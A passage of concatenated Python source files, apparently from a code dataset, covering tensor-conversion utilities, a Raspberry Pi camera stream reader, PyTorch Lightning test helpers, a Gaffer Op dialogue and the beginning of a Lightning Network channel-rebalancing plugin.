    if isinstance(item, dict):
        return {key: to_ndarray(value, dtype) for key, value in item.items()}
    if isinstance(item, (list, tuple)):
        if len(item) == 0:
            return None
        if isinstance(item[0], (numbers.Integral, numbers.Real)):
            return _as_array(item)
        if hasattr(item, '_fields'):  # namedtuple
            return type(item)(*[to_ndarray(element, dtype) for element in item])
        return [to_ndarray(element, dtype) for element in item]
    if isinstance(item, torch.Tensor):
        return item.numpy() if dtype is None else item.numpy().astype(dtype)
    if isinstance(item, np.ndarray):
        return item if dtype is None else item.astype(dtype)
    if isinstance(item, (bool, str)):
        return item
    if np.isscalar(item):
        return np.array(item)
    if item is None:
        return None
    raise TypeError("not support item type: {}".format(type(item)))
def to_list(item: Any) -> list:
    r"""
    Overview:
        Transform ``torch.Tensor`` and ``numpy.ndarray`` values to ``list``,
        keeping other data types unchanged.
    Arguments:
        - item (:obj:`Any`): the item to be transformed
    Returns:
        - item (:obj:`list`): the list after transformation
    Raises:
        - TypeError: if the item type is not supported.
    .. note::
        Now supports item type: :obj:`torch.Tensor`, :obj:`numpy.ndarray`, :obj:`dict`, :obj:`list`, \
        :obj:`tuple` and :obj:`None`
    """
    if item is None:
        return None
    if isinstance(item, (torch.Tensor, np.ndarray)):
        return item.tolist()
    if isinstance(item, (list, tuple)):
        return [to_list(element) for element in item]
    if isinstance(item, dict):
        return {key: to_list(value) for key, value in item.items()}
    if np.isscalar(item):
        return item
    raise TypeError("not support item type: {}".format(type(item)))
def tensor_to_list(item):
    r"""
    Overview:
        Transform ``torch.Tensor`` values to ``list``, keeping other data
        types unchanged.
    Arguments:
        - item (:obj:`Any`): the item to be transformed
    Returns:
        - item (:obj:`list`): the list after transformation
    Raises:
        - TypeError: if the item type is not supported.
    .. note::
        Now supports item type: :obj:`torch.Tensor`, :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
    """
    if item is None:
        return None
    if isinstance(item, torch.Tensor):
        return item.tolist()
    if isinstance(item, (list, tuple)):
        return [tensor_to_list(element) for element in item]
    if isinstance(item, dict):
        return {key: tensor_to_list(value) for key, value in item.items()}
    if np.isscalar(item):
        return item
    raise TypeError("not support item type: {}".format(type(item)))
def same_shape(data: list) -> bool:
    r"""
    Overview:
        Judge whether all data elements in a list have the same shape.
    Arguments:
        - data (:obj:`list`): the list of data
    Returns:
        - same (:obj:`bool`): whether all elements share exactly one shape
    """
    assert (isinstance(data, list))
    # Collapse the shapes into a set: one distinct shape means "all equal".
    return len({element.shape for element in data}) == 1
class LogDict(dict):
    '''
    Overview:
        ``dict`` subclass that converts any ``torch.Tensor`` value to a plain
        ``list`` on insertion, so stored values are always log-friendly.
    '''

    def _transform(self, data):
        # Tensors are flattened to (nested) python lists; anything else is kept as-is.
        return data.tolist() if isinstance(data, torch.Tensor) else data

    def __setitem__(self, key, value):
        super().__setitem__(key, self._transform(value))

    def update(self, data):
        # Route every entry through __setitem__ so the transform always applies.
        for key, value in data.items():
            self[key] = value
def build_log_buffer():
    r"""
    Overview:
        Build a log buffer: a ``dict`` subclass that transforms input data
        into a loggable format on insertion.
    Returns:
        - log_buffer (:obj:`LogDict`): Log buffer dict
    """
    return LogDict()
class CudaFetcher(object):
    """
    Overview:
        Fetch data from an iterable source on a background thread and
        transfer it to a specified device on a dedicated CUDA stream,
        buffering the results in a bounded queue.
    Interfaces:
        run, close
    """

    def __init__(self, data_source: Iterable, device: str, queue_size: int = 4, sleep: float = 0.1) -> None:
        """
        Arguments:
            - data_source (:obj:`Iterable`): source consumed via ``next``
            - device (:obj:`str`): target device, e.g. ``'cuda:0'``
            - queue_size (:obj:`int`): max prefetched batches held at once
            - sleep (:obj:`float`): seconds to wait when the queue is full
        """
        self._source = data_source
        self._queue = Queue(maxsize=queue_size)
        self._stream = torch.cuda.Stream()
        self._producer_thread = Thread(target=self._producer, args=(), name='cuda_fetcher_producer')
        self._sleep = sleep
        self._device = device
        # Fix: initialise the stop flag here. It was previously first assigned
        # in run(), so calling close() (or _producer reading it) before run()
        # raised AttributeError.
        self._end_flag = True

    def __next__(self) -> Any:
        # Blocks until the producer has put at least one batch.
        return self._queue.get()

    def run(self) -> None:
        """
        Overview:
            Start the producer thread: keep fetching data from the source,
            move it to the target device, and put it into the queue.
        """
        self._end_flag = False
        self._producer_thread.start()

    def close(self) -> None:
        """
        Overview:
            Stop the producer thread by setting ``_end_flag`` to ``True``.
        """
        self._end_flag = True

    def _producer(self) -> None:
        # Runs on the producer thread; all transfers happen on a private stream.
        with torch.cuda.stream(self._stream):
            while not self._end_flag:
                if self._queue.full():
                    time.sleep(self._sleep)
                else:
                    data = next(self._source)
                    data = to_device(data, self._device)
                    self._queue.put(data)
def get_tensor_data(data: Any) -> Any:
    """
    Overview:
        Extract pure tensor data from ``data`` without disturbing the grad
        computation graph (tensors come back as clones of ``.data``).
    """
    if isinstance(data, torch.Tensor):
        return data.data.clone()
    if data is None:
        return None
    if isinstance(data, Sequence):
        return [get_tensor_data(element) for element in data]
    if isinstance(data, dict):
        return {key: get_tensor_data(value) for key, value in data.items()}
    raise TypeError("not support type in get_tensor_data: {}".format(type(data)))
def unsqueeze(data: Any, dim: int = 0) -> Any:
    """
    Overview:
        Insert a size-1 dimension at position ``dim`` for every tensor in
        ``data``, recursing through sequences and dicts.
    Arguments:
        - data (:obj:`Any`): tensor or (possibly nested) sequence/dict of tensors
        - dim (:obj:`int`): the dimension index to unsqueeze, default 0
    Returns:
        - data (:obj:`Any`): same structure with every tensor unsqueezed at ``dim``
    Raises:
        - TypeError: if the data type is not supported.
    """
    if isinstance(data, torch.Tensor):
        return data.unsqueeze(dim)
    elif isinstance(data, Sequence):
        # Fix: propagate ``dim`` (it was previously dropped, always using 0).
        return [unsqueeze(d, dim) for d in data]
    elif isinstance(data, dict):
        # Fix: propagate ``dim`` (it was previously hard-coded to 0).
        return {k: unsqueeze(v, dim) for k, v in data.items()}
    else:
        raise TypeError("not support type in unsqueeze: {}".format(type(data)))
def get_null_data(template: Any, num: int) -> List[Any]:
    """
    Overview:
        Produce ``num`` placeholder transitions cloned from ``template``:
        each deep copy is marked null/done and has its 'reward' zeroed
        in place (the template itself is left untouched).
    """
    null_items = []
    for _ in range(num):
        item = copy.deepcopy(template)
        item['null'] = True
        item['done'] = True
        item['reward'].zero_()
        null_items.append(item)
    return null_items
|
picam.py | # import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
class PiVideoStream:
    """Threaded frame grabber for the Raspberry Pi camera.

    A background thread continuously pulls frames from the camera so that
    ``read()`` always returns the most recent one without blocking.
    """

    def __init__(self, resolution=(320, 240), framerate=32, rotation=0):
        # Configure the camera and an endless BGR capture stream.
        self.camera = PiCamera()
        self.camera.resolution = resolution
        self.camera.framerate = framerate
        self.camera.rotation = rotation
        self.rawCapture = PiRGBArray(self.camera, size=resolution)
        self.stream = self.camera.capture_continuous(
            self.rawCapture, format="bgr", use_video_port=True)
        # Latest frame plus the flag the worker thread polls for shutdown.
        self.frame = None
        self.stopped = False

    def start(self):
        """Launch the capture thread; returns self for call chaining."""
        Thread(target=self.update, args=()).start()
        return self

    def update(self):
        """Worker loop: keep only the newest frame; release resources on stop."""
        for capture in self.stream:
            self.frame = capture.array
            # Clear the buffer so the next frame can be written into it.
            self.rawCapture.truncate(0)
            if self.stopped:
                self.stream.close()
                self.rawCapture.close()
                self.camera.close()
                return

    def read(self):
        """Return the most recently captured frame (None until the first frame)."""
        return self.frame

    def stop(self):
        """Ask the capture thread to shut down and release the camera."""
        self.stopped = True
|
develop_utils.py | import os
import numpy as np
# from pl_examples import LightningTemplateModel
from pytorch_lightning import seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger, TestTubeLogger
from tests import TEMP_PATH, RANDOM_PORTS, RANDOM_SEEDS
from tests.base.model_template import EvalModelTemplate
import functools
def assert_speed_parity_relative(pl_times, pt_times, max_diff: float = 0.1):
    """Assert Lightning timings stay within ``max_diff`` relative overhead of
    the vanilla PyTorch timings.

    Arguments:
        pl_times: per-run Lightning timings (seconds)
        pt_times: per-run vanilla PyTorch timings (seconds)
        max_diff: maximum tolerated relative slowdown per run
    Raises:
        AssertionError: if any relative difference exceeds ``max_diff``.
    """
    diffs = np.asarray(pl_times) - np.asarray(pt_times)
    # norm by vanilla time
    diffs = diffs / np.asarray(pt_times)
    # Fix: np.alltrue was deprecated and removed in NumPy 2.0; np.all is the
    # supported equivalent.
    assert np.all(diffs < max_diff), \
        f"lightning {diffs} was slower than PT (threshold {max_diff})"
def assert_speed_parity_absolute(pl_times, pt_times, nb_epochs, max_diff: float = 0.6):
    """Assert Lightning timings stay within ``max_diff`` seconds-per-epoch of
    the vanilla PyTorch timings.

    Arguments:
        pl_times: per-run Lightning timings (seconds)
        pt_times: per-run vanilla PyTorch timings (seconds)
        nb_epochs: number of epochs the timings cover
        max_diff: maximum tolerated absolute slowdown per epoch
    Raises:
        AssertionError: if any per-epoch difference exceeds ``max_diff``.
    """
    diffs = np.asarray(pl_times) - np.asarray(pt_times)
    # norm by the epoch count to get a per-epoch difference
    diffs = diffs / nb_epochs
    # Fix: np.alltrue was deprecated and removed in NumPy 2.0; np.all is the
    # supported equivalent.
    assert np.all(diffs < max_diff), \
        f"lightning {diffs} was slower than PT (threshold {max_diff})"
def get_default_logger(save_dir, version=None):
    """Create a TensorBoard logger writing under *save_dir* (no real logs are saved)."""
    return TensorBoardLogger(save_dir, name='lightning_logs', version=version)
def get_data_path(expt_logger, path_dir=None):
    """Resolve the directory holding the logger's experiment data.

    Accepts either a full logger or a bare experiment object. Only the
    test-tube logger knows its data path directly; every other logger falls
    back to ``save_dir`` (or TEMP_PATH) plus a ``<name>/version_<v>``
    sub-folder, degrading to the parent dir when that sub-folder is absent.
    """
    # Every logger/experiment is expected to expose these two attributes.
    name, version = expt_logger.name, expt_logger.version
    # Only the test-tube experiment has a get_data_path() of its own.
    if isinstance(expt_logger, TestTubeLogger):
        experiment = expt_logger.experiment if hasattr(expt_logger, 'experiment') else expt_logger
        return experiment.get_data_path(name, version)
    # All other loggers: derive the location from save_dir / TEMP_PATH.
    if not path_dir:
        if hasattr(expt_logger, 'save_dir') and expt_logger.save_dir:
            path_dir = expt_logger.save_dir
        else:
            path_dir = TEMP_PATH
    candidate = os.path.join(path_dir, name, 'version_%s' % version)
    # Fall back when the versioned sub-folder does not exist (typical for test-tube).
    return candidate if os.path.isdir(candidate) else path_dir
def load_model_from_checkpoint(logger, root_weights_dir, module_class=EvalModelTemplate, path_expt=None):
    """Load *module_class* from the checkpoint at *root_weights_dir*.

    ``logger`` and ``path_expt`` are accepted for API compatibility but unused.
    """
    model = module_class.load_from_checkpoint(root_weights_dir)
    assert model is not None, 'loading model failed'
    return model
def assert_ok_model_acc(trainer, key='test_acc', thr=0.5):
    """Assert that the metric *key* recorded on *trainer* exceeds *thr*."""
    acc = trainer.callback_metrics[key]
    assert acc > thr, f"Model failed to get expected {thr} accuracy. {key} = {acc}"
def reset_seed():
    """Seed all RNGs with the next seed drawn from the shared RANDOM_SEEDS pool."""
    seed_everything(RANDOM_SEEDS.pop())
def set_random_master_port():
    """Re-seed RNGs and point MASTER_PORT at the next port from the shared pool."""
    reset_seed()
    os.environ['MASTER_PORT'] = str(RANDOM_PORTS.pop())
def init_checkpoint_callback(logger):
    """Build a ModelCheckpoint callback saving into the logger's save_dir."""
    return ModelCheckpoint(logger.save_dir)
def pl_multi_process_test(func):
    """Decorator: run *func* in a separate process and assert it succeeded.

    The child pushes 1 to a queue on success and -1 on any exception (after
    printing the traceback); the parent joins and asserts on that exit code,
    so the decorated test cannot pollute the parent interpreter's state.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        from multiprocessing import Process, Queue
        queue = Queue()

        def inner_f(queue, **kwargs):
            try:
                func(**kwargs)
                queue.put(1)
            except Exception as e:
                import traceback
                traceback.print_exc()
                queue.put(-1)

        # NOTE(review): positional *args are accepted by the wrapper but not
        # forwarded to ``func`` — presumably decorated tests are keyword-only;
        # confirm before relying on positional arguments.
        p = Process(target=inner_f, args=(queue,), kwargs=kwargs)
        p.start()
        p.join()
        result = queue.get()
        assert result == 1
    return wrapper
|
OpDialogue.py | ##########################################################################
#
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import sys
import threading
import traceback
import imath
import IECore
import Gaffer
import GafferUI
import GafferCortex
## A dialogue which allows a user to edit the parameters of an
# IECore.Op instance and then execute it.
class OpDialogue( GafferUI.Dialogue ) :
## Defines what happens when the op has been successfully executed :
#
# FromUserData : Get behaviour from ["UI"]["postExecuteBehaviour"] userData, which should
# contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to DisplayResult.
#
# None : Do nothing. The dialogue returns to the parameter editing state.
#
# Close : The dialogue is closed immediately.
#
# DisplayResult : The result is displayed, with a button for returning to the parameter editing state.
#
# DisplayResultAndClose : The result is displayed, with a button for closing the dialogue.
#
# NoneByDefault : deprecated - the same as DisplayResult
# CloseByDefault : deprecated - the same as DisplayResult
PostExecuteBehaviour = IECore.Enum.create( "FromUserData", "None_", "Close", "DisplayResult", "DisplayResultAndClose", "NoneByDefault", "CloseByDefault" )
## Defines which button has the focus when the op is displayed for editing.
#
# FromUserData : Gets the default button from ["UI"]["defaultButton"] userData, which
# should contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to OK.
#
# None : Neither button has the focus.
#
# OK : The OK button has the focus.
#
# Cancel : The cancel button has the focus.
DefaultButton = IECore.Enum.create( "FromUserData", "None_", "OK", "Cancel" )
# If executeInBackground is True, then the Op will be executed on another
# thread, allowing the UI to remain responsive during execution. This is
# the preferred method of operation, but it is currently not the default
# in case certain clients are relying on running the Op on the main thread.
def __init__(
self,
opInstanceOrOpHolderInstance,
title=None,
sizeMode=GafferUI.Window.SizeMode.Manual,
postExecuteBehaviour = PostExecuteBehaviour.FromUserData,
executeInBackground = False,
defaultButton = DefaultButton.FromUserData,
executeImmediately = False,
**kw
) :
# sort out our op and op holder
if isinstance( opInstanceOrOpHolderInstance, IECore.Op ) :
opInstance = opInstanceOrOpHolderInstance
self.__node = GafferCortex.ParameterisedHolderNode()
self.__node.setParameterised( opInstance )
# set the current plug values as userDefaults to provide
# a clean NodeUI based on the initial settings of the Op.
# we assume that if an OpHolder was passed directly then
# the metadata has already been setup as preferred.
self.__setUserDefaults( self.__node )
else :
self.__node = opInstanceOrOpHolderInstance
opInstance = self.__node.getParameterised()[0]
# initialise the dialogue
if title is None :
title = IECore.CamelCase.toSpaced( opInstance.typeName() )
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
# decide what we'll do after execution.
if postExecuteBehaviour == self.PostExecuteBehaviour.FromUserData :
postExecuteBehaviour = self.PostExecuteBehaviour.DisplayResult
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["postExecuteBehaviour"]
if d is not None :
for v in self.PostExecuteBehaviour.values() :
if str( v ).lower() == d.value.lower() :
postExecuteBehaviour = v
break
else :
# backwards compatibility with batata
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["closeAfterExecution"]
if d is not None :
postExecuteBehaviour = self.PostExecuteBehaviour.Close if d.value else self.PostExecuteBehaviour.DisplayResult
self.__postExecuteBehaviour = postExecuteBehaviour
self.__executeInBackground = executeInBackground
self.__defaultButton = defaultButton
# make a frame to contain our main ui element. this will
# contain different elements depending on our state.
self.__frame = GafferUI.Frame()
self._setWidget( self.__frame )
# get the ui for the op - we'll use this when we want
# the user to edit parameters.
self.__parameterEditingUI = GafferUI.NodeUI.create( self.__node )
# build a ui element for progress feedback and suchlike.
# we'll use this when executing and displaying the result.
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as self.__progressUI :
GafferUI.Spacer( imath.V2i( 1 ), preferredSize = imath.V2i( 1, 1 ) )
self.__progressIconFrame = GafferUI.Frame(
borderStyle = GafferUI.Frame.BorderStyle.None_,
parenting = {
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center
}
)
self.__progressLabel = GafferUI.Label(
parenting = {
"expand" : True,
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center,
}
)
GafferUI.Spacer( imath.V2i( 250, 1 ), preferredSize = imath.V2i( 250, 1 ) )
with GafferUI.Collapsible( "Details", collapsed = True ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget( toolbars = True )
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleStateChangedConnection = self.__messageCollapsible.stateChangedSignal().connect(
Gaffer.WeakMethod( self.__messageCollapsibleStateChanged ), scoped = True
)
# add buttons. our buttons mean different things depending on our current state,
# but they equate roughly to going forwards or going backwards.
self.__backButton = self._addButton( "Back" )
self.__forwardButton = self._addButton( "Forward" )
self.__preExecuteSignal = GafferUI.WidgetSignal()
self.__postExecuteSignal = Gaffer.Signals.Signal2()
self.__opExecutedSignal = Gaffer.Signals.Signal1()
self.__haveResizedToFitParameters = False
if executeImmediately :
self.__initiateExecution()
else :
self.__initiateParameterEditing()
## Returns the ParameterisedHolder used to store the Op.
# This may be used to edit parameter values.
def parameterisedHolder( self ) :
return self.__node
## Signal emitted before executing the Op.
# Slots should have the signature `bool slot( opDialogue )`,
# and may return True to cancel execution, or False to
# allow it to continue.
def preExecuteSignal( self ) :
return self.__preExecuteSignal
## Signal emitted after executing the Op.
# Slots should have the signature `slot( opDialogue, result )`.
def postExecuteSignal( self ) :
return self.__postExecuteSignal
## A signal called when the user has pressed the execute button
# and the Op has been successfully executed. This is passed the
# result of the execution.
## \deprecated Use postExecuteSignal() instead.
def opExecutedSignal( self ) :
return self.__opExecutedSignal
## Returns the internal MessageWidget used for displaying messages
# output by the Op.
def messageWidget( self ) :
return self.__messageWidget
## Causes the dialogue to enter a modal state, returning the result
# of executing the Op, or None if the user cancelled the operation. Any
# validation or execution errors will be reported to the user and return
# to the dialogue for them to cancel or try again.
def waitForResult( self, **kw ) :
self.__resultOfWait = None
self.setModal( True, **kw ) # will return when the dialogue is closed
return self.__resultOfWait
def _acceptsClose( self ) :
# we mustn't allow the window to be closed while
# the op is running in the background.
return self.__state != self.__State.Execution
__State = IECore.Enum.create( "ParameterEditing", "Execution", "ErrorDisplay", "ResultDisplay" )
def __initiateParameterEditing( self, *unused ) :
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connectFront( Gaffer.WeakMethod( self.__close ), scoped = True )
executeLabel = "OK"
with IECore.IgnoredExceptions( KeyError ) :
executeLabel = self.__node.getParameterised()[0].userData()["UI"]["buttonLabel"].value
self.__forwardButton.setText( executeLabel )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connectFront( Gaffer.WeakMethod( self.__initiateExecution ), scoped = True )
self.__frame.setChild( self.__parameterEditingUI )
self.__focusDefaultButton()
self.__state = self.__State.ParameterEditing
# when we first display our parameters, we want to ensure that the window
# is big enough to fit them nicely. we don't do this the next time we show
# the parameters, because the user may have deliberately resized the window.
if not self.__haveResizedToFitParameters :
self.resizeToFitChild( shrink = False )
self.__haveResizedToFitParameters = True
def __close( self, *unused ) :
self.__state = self.__State.ParameterEditing
self.close()
def __initiateExecution( self, *unused ) :
if self.preExecuteSignal()( self ) :
return
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Processing...</h3>" )
self.__backButton.setEnabled( False )
self.__backButton.setText( "Cancel" )
self.__forwardButton.setVisible( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self.__state = self.__State.Execution
if self.__executeInBackground :
self.__frame.setChild( self.__progressUI )
threading.Thread( target = self.__execute ).start()
else :
# we don't display progress when we're not threaded,
# because we have no way of updating it.
self.__execute()
def __execute( self ) :
try :
self.__node.setParameterisedValues()
with self.__messageWidget.messageHandler() :
result = self.__node.getParameterised()[0]()
except Exception as e :
result = sys.exc_info()
if self.__executeInBackground :
GafferUI.EventLoop.executeOnUIThread( IECore.curry( self.__finishExecution, result ) )
else :
# We're being called on the main gui thread, most likely from a button click on
# the forward button. If we called __finishExecution() immediately, it would add
# new slots to the button click signal, and these would be executed immediately
# for the _current_ click - this is not what we want! So we defer __finishExecution
# to the next idle event, when the current click is a thing of the past.
## \todo The documentation for boost::signals2 seems to imply that it has a different
# behaviour, and that slots added during signal emission are ignored until the next
# emission. If we move to using signals2, we may be able to revert this change.
GafferUI.EventLoop.addIdleCallback( IECore.curry( self.__finishExecution, result ) )
def __finishExecution( self, result ) :

	# Receives either a successful result (an IECore.Object) or an
	# exc_info tuple from __execute(), and routes to the appropriate display.
	if isinstance( result, IECore.Object ) :

		if self.getModal() :
			# stash the result — presumably retrieved by a modal wait
			# elsewhere in the class; confirm against the full class source.
			self.__resultOfWait = result

		self.__initiateResultDisplay( result )

		self.opExecutedSignal()( result )
		self.postExecuteSignal()( self, result )

	else :

		self.__initiateErrorDisplay( result )

	return False # remove idle callback
def __initiateErrorDisplay( self, exceptionInfo ) :

	# Switch the dialogue into its error appearance : failure icon,
	# expanded message log, Cancel (close) and Retry (edit again) buttons.
	self.__progressIconFrame.setChild( GafferUI.Image( "failure.png" ) )
	self.__progressLabel.setText( "<h3>Failed</h3>" )

	self.__messageCollapsible.setCollapsed( False )

	self.__backButton.setVisible( True )
	self.__backButton.setText( "Cancel" )
	self.__backButton.setEnabled( True )
	self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ), scoped = True )

	self.__forwardButton.setVisible( True )
	self.__forwardButton.setText( "Retry" )
	self.__forwardButton.setEnabled( True )
	self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ), scoped = True )

	# log the full traceback at Debug level and a concise summary at Error level
	self.__messageWidget.messageHandler().handle(
		IECore.Msg.Level.Debug,
		"Python Traceback",
		"".join( traceback.format_exception( *exceptionInfo ) )
	)
	self.__messageWidget.messageHandler().handle(
		IECore.Msg.Level.Error,
		"Problem Executing {opName}".format( opName=self.__node.getParameterised()[0].typeName() ),
		str( exceptionInfo[1] ),
	)

	self.__frame.setChild( self.__progressUI )

	self.__forwardButton._qtWidget().setFocus()

	self.__state = self.__State.ErrorDisplay
def __initiateResultDisplay( self, result ) :

	# Although we computed a result successfully, there may still be minor problems
	# indicated by messages the Op emitted - check for those.
	problems = []
	for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
		count = self.__messageWidget.messageCount( level )
		if count :
			problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )

	if not problems :

		# If there were no problems, then our post execute behaviour may
		# indicate that we don't need to display anything - deal with
		# those cases.
		if self.__postExecuteBehaviour == self.PostExecuteBehaviour.Close :
			self.__close()
			return
		elif self.__postExecuteBehaviour == self.PostExecuteBehaviour.None_ :
			self.__initiateParameterEditing()
			return

	# Either the post execute behaviour says we should display the result, or we're
	# going to anyway, because we don't want the problems to go unnoticed.
	self.__progressIconFrame.setChild(
		GafferUI.Image( "successWarning.png" if problems else "success.png" )
	)

	completionMessage = "Completed"
	if problems :
		completionMessage += " with " + " and ".join( problems )
		self.__messageCollapsible.setCollapsed( False )

	self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )

	# show the stringified result in the message log
	self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Info, "Result", str( result ) )

	self.__backButton.setText( "Close" )
	self.__backButton.setEnabled( True )
	self.__backButton.setVisible( True )
	self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ), scoped = True )

	self.__forwardButton.setText( "Again!" )
	self.__forwardButton.setEnabled( True )
	self.__forwardButton.setVisible( True )
	self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ), scoped = True )

	# these behaviours want the dialogue to go away on its own, so hide
	# the "Again!" button
	if self.__postExecuteBehaviour in ( self.PostExecuteBehaviour.DisplayResultAndClose, self.PostExecuteBehaviour.Close ) :
		self.__forwardButton.setVisible( False )

	self.__frame.setChild( self.__progressUI )

	self.__backButton._qtWidget().setFocus()

	self.__state = self.__State.ResultDisplay
def __focusDefaultButton( self ) :

	defaultButton = self.__defaultButton

	if defaultButton == self.DefaultButton.FromUserData :

		defaultButton = self.DefaultButton.OK

		# the Op may override the default via ["UI"]["defaultButton"] userData
		d = None
		with IECore.IgnoredExceptions( KeyError ) :
			d = self.__node.getParameterised()[0].userData()["UI"]["defaultButton"]

		if d is not None :
			# case-insensitive match against the DefaultButton enum names
			for v in self.DefaultButton.values() :
				if str( v ).lower() == d.value.lower() :
					defaultButton = v
					break

	if defaultButton == self.DefaultButton.None_ :
		self._qtWidget().setFocus()
	elif defaultButton == self.DefaultButton.Cancel :
		self.__backButton._qtWidget().setFocus()
	else :
		self.__forwardButton._qtWidget().setFocus()
def __messageCollapsibleStateChanged( self, collapsible ) :

	if not collapsible.getCollapsed() :
		# make the window bigger to better fit the messages, but don't make
		# it any smaller than it currently is.
		self.resizeToFitChild( shrink = False )
		# remove our connection - we only want to resize the first time we
		# show the messages. after this we assume that if the window is smaller
		# it is because the user has made it so, and wishes it to remain so.
		self.__messageCollapsibleStateChangedConnection = None
def __setUserDefaults( self, graphComponent ) :

	# Recursively record the current value of every value plug as its
	# "userDefault" metadata, ignoring plugs whose value can't be read.
	isValuePlug = isinstance( graphComponent, Gaffer.Plug ) and hasattr( graphComponent, "getValue" )
	if isValuePlug :
		with IECore.IgnoredExceptions( Exception ) :
			Gaffer.Metadata.registerValue( graphComponent, "userDefault", graphComponent.getValue() )

	for child in graphComponent.children() :
		self.__setUserDefaults( child )
|
rebalance.py | #!/usr/bin/env python3
from pyln.client import Plugin, Millisatoshi, RpcError
from threading import Thread, Lock
from datetime import timedelta
import time
import uuid
plugin = Plugin()
# global flag: set by rebalancestop to signal a running rebalance loop to exit
plugin.rebalance_stop = False
def setup_routing_fees(plugin, route, msatoshi):
    """Fill in per-hop amounts, fees and CLTV delays for `route` in place.

    Walks the route backwards from the destination, so each earlier hop
    forwards enough to cover the fees of all later hops. `msatoshi` is the
    amount the destination should receive.
    """
    delay = plugin.cltv_final
    for r in reversed(route):
        # set this hop's amounts *before* adding this channel's own fee
        r['msatoshi'] = msatoshi.millisatoshis
        r['amount_msat'] = msatoshi
        r['delay'] = delay
        channels = plugin.rpc.listchannels(r['channel'])
        # select the channel half whose destination is this hop's node
        ch = next(c for c in channels.get('channels') if c['destination'] == r['id'])
        fee = Millisatoshi(ch['base_fee_millisatoshi'])
        # BOLT #7 requires fee >= fee_base_msat + ( amount_to_forward * fee_proportional_millionths / 1000000 )
        fee += (msatoshi * ch['fee_per_millionth'] + 10**6 - 1) // 10**6  # integer math trick to round up
        msatoshi += fee
        delay += ch['delay']
def get_channel(plugin, payload, peer_id, scid, check_state: bool = False):
    """Return the channel with short id `scid` on peer `peer_id`.

    With check_state=True, additionally require the channel to be in
    CHANNELD_NORMAL state and the peer to be connected, raising an
    RpcError otherwise.
    """
    peer = plugin.rpc.listpeers(peer_id).get('peers')[0]
    channel = next(ch for ch in peer['channels'] if ch.get('short_channel_id') == scid)
    if not check_state:
        return channel
    if channel['state'] != "CHANNELD_NORMAL":
        raise RpcError('rebalance', payload, {'message': 'Channel %s not in state CHANNELD_NORMAL, but: %s' % (scid, channel['state'])})
    if not peer['connected']:
        raise RpcError('rebalance', payload, {'message': 'Channel %s peer is not connected.' % scid})
    return channel
def amounts_from_scid(plugin, scid):
    """Return (our_msat, total_msat) for the funded channel `scid`."""
    funded = plugin.rpc.listfunds().get('channels')
    entry = next(ch for ch in funded if ch.get('short_channel_id') == scid)
    return Millisatoshi(entry['our_amount_msat']), Millisatoshi(entry['amount_msat'])
def peer_from_scid(plugin, short_channel_id, my_node_id, payload):
    """Return the node id on the far end of `short_channel_id`.

    Raises an RpcError when no channel half with that scid originates
    from our own node.
    """
